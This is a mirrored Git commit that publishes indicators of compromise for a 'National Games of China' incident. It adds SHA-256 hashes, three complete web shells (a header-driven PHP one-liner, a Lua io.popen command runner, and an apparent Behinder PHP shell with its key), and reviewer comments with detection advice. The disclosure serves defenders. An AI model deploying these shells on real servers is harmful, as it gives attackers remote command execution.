mirror of
https://github.com/avast/ioc
synced 2024-06-16 11:58:39 +00:00
National Games of China
parent
3657eda5b8
commit
477a48f73d
Binary file not shown.
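--- a/NationalGamesOfChina/README.md
+++ b/NationalGamesOfChina/README.md
@@ -0,0 +1,26 @@
+# IoC for National Games of China incident
+
+### Table of Contents
+* [IoCs](#IoCs)
+* [Source Code](#event-names)
+
+## Samples (SHA-256)
+#### National Games of China incident related files
+```
+0C6AE9DE10BEE6568EC3AD24918C829B7E5132CC0DD1665D4BBF1C3FE84451B6
+0D1504A9AE319BDC320F938D2CDF72CBA18277B3F2B311ABF0BACAD2517DABC0
+CAC30CC2F4646979D0BE8B4D5F3A1F87351B3BB77F22E5064BD034CEC9E119BB
+0AEB963B4566DC2224D34B4885336C666198DB2AC64C810586CE3B17EF3DA59F
+DFFA7E31797339F3CE7EC453161B60010EDA3DD2E52AA9F147AB4389672C3536
+BDD4D0BB36D07AE6B97FFBCD386C54E1B15FEFE65329FF0389DFD5739CD3CFF2
+3A8DC7E730A1F82F65F1731CB31E05E2F749A9E89AB8529168A082D24680D2DD
+EC8AEF085D3CC57A4E92A613E128F2D9C7B5F03B8E017DD80D89BFEADA228639
+2CAB3B0391BF3ACE689FC697F522B3C86411E059AB8C1F4F5B7357B484B93035
+D033756A57D8A2758DE40895849E2146D571B3B44F3089EB68C31483784586CD
+```
+## Source Code files
+```
+admin2.php
+conf.lua
+miss1.php
+```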
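--- a/NationalGamesOfChina/admin2.php
+++ b/NationalGamesOfChina/admin2.php
@@ -0,0 +1 @@
+<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);?>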
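Review bot: admin2.php is added as a live, unmodified one-line PHP file under its original name, so any checkout of this repository beneath a PHP-enabled document root would expose a working handler that invokes a function named by the request's `x` header; conf.lua and miss1.php in this commit have the same problem. Storing the samples under a non-executable name (for example `admin2.php.txt`) or inside a password-protected archive, and stating that in the README, keeps them readable for analysts without leaving them runnable. The README also lists the ten SHA-256 values and the three source files separately with no mapping between them, so a reader cannot tell whether any listed hash corresponds to this exact file content; a `hash  filename` column would fix that.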
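--- a/NationalGamesOfChina/conf.lua
+++ b/NationalGamesOfChina/conf.lua
@@ -0,0 +1,24 @@
+package.path = package.path .. ';../app/lua/?.lua;./app/lua/?.lua'
+web = require "libs/webutils"
+
+
+local handler = {}
+
+function handler.cc(self, action)
+local a = io.popen(mg.base64_decode(mg.base64_decode(web:post("username")))):read("*all")
+--print(a)
+web:plain(mg.base64_encode(mg.base64_encode(a)))
+end
+
+
+
+--- The main loop
+local a = web:get("a")
+if handler[a] then
+local result, err = pcall(handler[a], heandler, a)
+if result == false then
+web:json(json.encode({cmd='error', op='error', code=500, result=result, errmsg=err}))
+end
+else
+web:html("hello test!");
+end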
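Review bot: The commit publishes conf.lua without any description of what to look for, and the indicators a defender can actually use are all in `handler.cc` and the dispatcher below it: `io.popen` fed from the POST field `username` after two `mg.base64_decode` calls, selected by the `a` query parameter. A README line such as `conf.lua – Lua web handler; spawns a process from the web server via io.popen, input and output double base64` would let responders hunt on child processes of the web server and on that nested-decode string. The misspelled `heandler` in the `pcall` line and the `hello test!` fallback response look like stable content markers too, assuming the rendered page reproduced them faithfully. Indentation of the original file is not visible in this rendering.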
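--- a/NationalGamesOfChina/miss1.php
+++ b/NationalGamesOfChina/miss1.php
@@ -0,0 +1,26 @@
+<?php
+@error_reporting(0);
+session_start();
+$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
+$_SESSION['k']=$key;
+session_write_close();
+$post=file_get_contents("php://input");
+if(!extension_loaded('openssl'))
+{
+$t="base64_"."decode";
+$post=$t($post."");
+
+for($i=0;$i<strlen($post);$i++) {
+$post[$i] = $post[$i]^$key[$i+1&15];
+}
+}
+else
+{
+$post=openssl_decrypt($post, "AES128", $key);
+}
+$arr=explode('|',$post);
+$func=$arr[0];
+$params=$arr[1];
+class C{public function __invoke($p) {eval($p."");}}
+@call_user_func(new C(),$params);
+?>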
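Review bot: The hard-coded `$key="e45e329feb5d925b"` is the most reusable indicator in this file and is not listed anywhere in the README. The inline comment (in Chinese) states that the key is the first 16 characters of the 32-character MD5 of the connection password and that the default password is `rebeyond`, so this sample carries an unchanged default; it appears to match what is publicly documented for the Behinder web shell. Listing the key string and an English rendering of that comment in the README would let defenders search web roots for it directly. Other content markers visible here are the `class C{public function __invoke($p) {eval($p."");}}` wrapper and the split `"base64_"."decode"` string. Request bodies are AES-128 or XOR encoded with that key, so payload-based network signatures are unlikely to match and file-content and process-level detection are the practical options.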
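--- a/NationalGamesOfChina/samples.sha256
+++ b/NationalGamesOfChina/samples.sha256
@@ -0,0 +1,10 @@
+0C6AE9DE10BEE6568EC3AD24918C829B7E5132CC0DD1665D4BBF1C3FE84451B6
+0D1504A9AE319BDC320F938D2CDF72CBA18277B3F2B311ABF0BACAD2517DABC0
+CAC30CC2F4646979D0BE8B4D5F3A1F87351B3BB77F22E5064BD034CEC9E119BB
+0AEB963B4566DC2224D34B4885336C666198DB2AC64C810586CE3B17EF3DA59F
+DFFA7E31797339F3CE7EC453161B60010EDA3DD2E52AA9F147AB4389672C3536
+BDD4D0BB36D07AE6B97FFBCD386C54E1B15FEFE65329FF0389DFD5739CD3CFF2
+3A8DC7E730A1F82F65F1731CB31E05E2F749A9E89AB8529168A082D24680D2DD
+EC8AEF085D3CC57A4E92A613E128F2D9C7B5F03B8E017DD80D89BFEADA228639
+2CAB3B0391BF3ACE689FC697F522B3C86411E059AB8C1F4F5B7357B484B93035
+D033756A57D8A2758DE40895849E2146D571B3B44F3089EB68C31483784586CD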